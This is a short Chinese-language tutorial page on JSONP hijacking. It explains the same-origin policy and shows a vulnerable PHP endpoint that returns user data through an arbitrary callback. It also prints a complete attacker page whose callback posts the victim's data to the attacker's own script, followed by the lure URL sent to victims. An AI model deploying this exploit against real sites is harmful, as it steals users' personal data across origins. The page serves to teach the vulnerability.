JSONP 劫持漏洞
0x01 Jsonp简介:
Jsonp(JSON with Padding) 是 json 的一种"使用模式",可以让网页从别的域名(网站)那获取资料,即跨域读取数据。
为什么我们从不同的域(网站)访问数据需要一个特殊的技术(JSONP )呢?这是因为同源策略。
同源策略,它是由Netscape提出的一个著名的安全策略,现在所有支持JavaScript 的浏览器都会使用这个策略。
0x02 JSONP劫持漏洞实例
服务端getUser.php
<?php header('Content-type: application/json'); $jsoncallback = htmlspecialchars($_REQUEST ['jsoncallback']);//获取回调函数名 //json数据 //$json_data = '["id","user"]'; $json_data='({"id":"1","name":"Aaron"})'; echo $jsoncallback . "(" . $json_data . ")";//输出jsonp格式的数据 ?>
攻击者
<?php $url = $_GET['url'] ? $_GET['url'] : "http://www.aaa.com"; $callback = $_GET['c'] ? $_GET['c'] : "json"; $url = htmlspecialchars(addslashes($url)); $callback = htmlspecialchars(addslashes($callback)); $script = '<script src="https://www.chinacycc.com/template/js/jquery-2.2.4.min.js"></script> <script> function ccc(a){ var info = JSON.stringify(a) $.post("./get.php", { info: info, },); } </script> <script src="'. $url .'?'.$callback .'=ccc"></script>'; echo $script; ?>
攻击者构造了一个payload:
http://攻击者/jsonp/index.php?c=服务端的回调参数&url=http://服务端/getUser.php
然后将这个发送给受害者,当受害者一点击了,攻击者就能获取受害者相应的敏感信息
相关推荐
fengchao000 2020-06-17
adonislu 2020-05-16
zmosquito 2020-05-10
adonislu 2020-05-10
somebodyoneday 2020-04-22
fengchao000 2020-04-22
fengchao000 2020-04-11
Richardxx 2020-03-07
somebodyoneday 2020-03-06
fengchao000 2020-03-05
somebodyoneday 2020-02-16
xiaouncle 2020-02-13
baijinswpu 2020-01-29
fengchao000 2020-01-10
fengchao000 2019-12-25
somebodyoneday 2013-07-11
qianqianxiao 2015-08-13